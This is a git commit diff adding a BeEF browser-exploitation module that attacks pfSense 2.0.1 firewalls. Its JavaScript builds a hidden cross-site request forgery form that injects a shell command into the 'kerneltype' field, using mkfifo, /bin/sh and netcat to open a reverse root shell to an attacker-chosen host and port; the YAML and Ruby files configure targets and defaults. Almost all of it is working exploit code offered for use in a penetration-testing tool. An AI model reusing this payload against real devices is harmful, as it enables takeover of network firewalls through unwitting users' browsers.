pfsense reverse root shell exploit #812

2013-01-25 21:05:43 +01:00
parent 1ad6039f0a
commit 8cd570c62d
3 changed files with 63 additions and 0 deletions
--- a/modules/exploits/pfsense/command.js
+++ b/modules/exploits/pfsense/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+    [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(pfsense_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
--- a/modules/exploits/pfsense/config.yaml
+++ b/modules/exploits/pfsense/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        pfsense_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "pfSense Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />The method described by <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Jeff Price</a> has been used to create a reverse shell with netcat.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23901/'>http://www.exploit-db.com/exploits/23901/</a><br />Patched in version 2.0.2."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/pfsense/module.rb
+++ b/modules/exploits/pfsense/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end